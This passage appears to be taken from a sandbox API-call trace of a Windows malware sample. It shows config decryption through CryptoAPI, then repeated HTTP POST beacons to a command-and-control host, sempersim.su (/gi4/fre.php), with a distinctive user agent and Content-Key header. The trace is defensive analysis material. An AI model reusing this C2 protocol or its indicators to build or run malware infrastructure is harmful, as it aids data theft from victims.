szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0276.733] GetProcessHeap () returned 0x5b0000 [0276.733] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0276.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0276.737] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0276.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0276.738] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0276.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0276.739] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.739] GetProcessHeap () returned 0x5b0000 [0276.740] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0276.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0276.741] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3590, pdwDataLen=0xdfcfc | out: pbData=0x5d3590, pdwDataLen=0xdfcfc) returned 1 [0276.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0276.743] CryptDestroyKey (hKey=0x5be048) returned 1 [0276.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0276.744] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0276.744] GetProcessHeap () returned 0x5b0000 [0276.744] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0276.744] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0276.745] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0276.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0276.746] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0276.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0276.747] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0276.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0276.748] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0276.748] GetProcessHeap () returned 0x5b0000 [0276.748] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb128 [0276.748] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0276.748] GetProcessHeap () returned 0x5b0000 [0276.749] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb128 | out: hHeap=0x5b0000) returned 1 [0276.749] GetProcessHeap () returned 0x5b0000 [0276.749] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0276.752] GetProcessHeap () returned 0x5b0000 [0276.752] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3590 | out: hHeap=0x5b0000) returned 1 [0276.752] GetProcessHeap () returned 0x5b0000 [0276.752] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d32c0 [0276.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0276.753] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0276.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0276.761] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0276.770] GetProcessHeap () returned 0x5b0000 [0276.770] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0276.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0276.771] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0276.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0276.772] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0276.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0276.773] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.773] GetProcessHeap () returned 0x5b0000 [0276.774] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0276.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0276.775] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d32c0, pdwDataLen=0xdfcfc | out: pbData=0x5d32c0, pdwDataLen=0xdfcfc) returned 1 [0276.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0276.776] CryptDestroyKey (hKey=0x5be288) returned 1 [0276.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0276.777] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0276.777] GetProcessHeap () returned 0x5b0000 [0276.777] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5070 [0276.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0276.778] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0276.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0276.779] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0276.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0276.780] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0276.780] GetProcessHeap () returned 0x5b0000 [0276.780] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0276.780] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdcf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0276.789] GetProcessHeap () returned 0x5b0000 [0276.790] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca910 [0276.790] socket (af=2, type=1, protocol=6) returned 0x3d4 [0276.790] connect (s=0x3d4, name=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0276.859] FreeAddrInfoW (pAddrInfo=0x5cdcf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0276.860] GetProcessHeap () returned 0x5b0000 [0276.860] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5dd8 [0276.861] GetProcessHeap () returned 0x5b0000 [0276.861] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0276.861] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0276.862] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0276.862] GetProcessHeap () returned 0x5b0000 [0276.862] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0276.862] GetProcessHeap () returned 0x5b0000 [0276.863] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0276.863] GetProcessHeap () returned 0x5b0000 [0276.863] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2e40 [0276.863] GetProcessHeap () returned 0x5b0000 [0276.863] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0276.864] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0276.865] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0276.865] GetProcessHeap () returned 0x5b0000 [0276.865] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0276.865] GetProcessHeap () returned 0x5b0000 [0276.865] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0276.866] send (s=0x3d4, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0276.866] send (s=0x3d4, buf=0x5d1e18*, len=159, flags=0) returned 159 [0276.866] GetProcessHeap () returned 0x5b0000 [0276.866] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0276.866] recv (in: s=0x3d4, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0278.085] GetProcessHeap () returned 0x5b0000 [0278.085] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0278.085] GetProcessHeap () returned 0x5b0000 [0278.086] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0278.086] GetProcessHeap () returned 0x5b0000 [0278.086] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0278.086] GetProcessHeap () returned 0x5b0000 [0278.087] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5dd8 | out: hHeap=0x5b0000) returned 1 [0278.087] closesocket (s=0x3d4) returned 0 [0278.089] GetProcessHeap () returned 0x5b0000 [0278.089] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca910 | out: hHeap=0x5b0000) returned 1 [0278.089] GetProcessHeap () returned 0x5b0000 [0278.089] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5070 | out: hHeap=0x5b0000) returned 1 [0278.090] GetProcessHeap () returned 0x5b0000 [0278.090] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0278.090] GetProcessHeap () returned 0x5b0000 [0278.090] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0278.090] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc48) returned 0x3d4 [0278.103] Sleep (dwMilliseconds=0xea60) [0278.109] GetProcessHeap () returned 0x5b0000 [0278.109] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2fa8 [0278.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0278.110] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0278.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0278.119] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0278.130] GetProcessHeap () returned 0x5b0000 [0278.130] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0278.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0278.131] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0278.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0278.132] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0278.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0278.133] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.133] GetProcessHeap () returned 0x5b0000 [0278.133] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0278.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0278.134] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2fa8, pdwDataLen=0xdfcfc | out: pbData=0x5d2fa8, pdwDataLen=0xdfcfc) returned 1 [0278.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0278.151] CryptDestroyKey (hKey=0x5be288) returned 1 [0278.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0278.152] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0278.152] GetProcessHeap () returned 0x5b0000 [0278.152] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5070 [0278.153] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0278.153] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0278.154] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0278.154] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0278.155] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0278.155] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0278.156] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0278.157] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0278.158] GetProcessHeap () returned 0x5b0000 [0278.158] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0278.158] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0278.158] GetProcessHeap () returned 0x5b0000 [0278.158] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0278.160] GetProcessHeap () returned 0x5b0000 [0278.161] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5070 | out: hHeap=0x5b0000) returned 1 [0278.161] GetProcessHeap () returned 0x5b0000 [0278.161] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2fa8 | out: hHeap=0x5b0000) returned 1 [0278.161] GetProcessHeap () returned 0x5b0000 [0278.161] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d33e0 [0278.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0278.162] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0278.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0278.168] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0278.178] GetProcessHeap () returned 0x5b0000 [0278.178] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c86b0 [0278.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0278.179] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c86b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0278.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0278.180] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0278.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0278.181] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.181] GetProcessHeap () returned 0x5b0000 [0278.182] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c86b0 | out: hHeap=0x5b0000) returned 1 [0278.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0278.183] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d33e0, pdwDataLen=0xdfcfc | out: pbData=0x5d33e0, pdwDataLen=0xdfcfc) returned 1 [0278.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0278.184] CryptDestroyKey (hKey=0x5be048) returned 1 [0278.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0278.185] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0278.185] GetProcessHeap () returned 0x5b0000 [0278.185] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0278.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0278.186] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0278.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0278.190] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0278.191] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0278.191] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0278.191] GetProcessHeap () returned 0x5b0000 [0278.191] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb1a0 [0278.191] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce0b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0278.192] GetProcessHeap () returned 0x5b0000 [0278.193] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9e0 [0278.193] socket (af=2, type=1, protocol=6) returned 0x3d8 [0278.193] connect (s=0x3d8, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0278.264] FreeAddrInfoW (pAddrInfo=0x5ce0b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0278.264] GetProcessHeap () returned 0x5b0000 [0278.264] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5e60 [0278.264] GetProcessHeap () returned 0x5b0000 [0278.264] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0278.267] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0278.267] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0278.267] GetProcessHeap () returned 0x5b0000 [0278.268] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0278.268] GetProcessHeap () returned 0x5b0000 [0278.268] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0278.268] GetProcessHeap () returned 0x5b0000 [0278.268] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d32c0 [0278.268] GetProcessHeap () returned 0x5b0000 [0278.268] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0278.269] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0278.270] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0278.270] GetProcessHeap () returned 0x5b0000 [0278.270] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0278.270] GetProcessHeap () returned 0x5b0000 [0278.270] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0278.270] send (s=0x3d8, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0278.271] send (s=0x3d8, buf=0x5d1e18*, len=159, flags=0) returned 159 [0278.271] GetProcessHeap () returned 0x5b0000 [0278.271] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0278.271] recv (in: s=0x3d8, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0279.555] GetProcessHeap () returned 0x5b0000 [0279.556] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0279.556] GetProcessHeap () returned 0x5b0000 [0279.556] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0279.556] GetProcessHeap () returned 0x5b0000 [0279.556] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0279.556] GetProcessHeap () returned 0x5b0000 [0279.557] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5e60 | out: hHeap=0x5b0000) returned 1 [0279.557] closesocket (s=0x3d8) returned 0 [0279.558] GetProcessHeap () returned 0x5b0000 [0279.558] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9e0 | out: hHeap=0x5b0000) returned 1 [0279.558] GetProcessHeap () returned 0x5b0000 [0279.558] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0279.558] GetProcessHeap () returned 0x5b0000 [0279.558] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d33e0 | out: hHeap=0x5b0000) returned 1 [0279.558] GetProcessHeap () returned 0x5b0000 [0279.559] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb1a0 | out: hHeap=0x5b0000) returned 1 [0279.575] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc4c) returned 0x3d8 [0279.581] Sleep (dwMilliseconds=0xea60) [0279.593] GetProcessHeap () returned 0x5b0000 [0279.593] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3500 [0279.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0279.594] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0279.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0279.603] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0279.614] GetProcessHeap () returned 0x5b0000 [0279.614] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0279.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0279.615] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0279.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0279.616] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0279.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0279.617] CryptSetKeyParam (hKey=0x5be288, 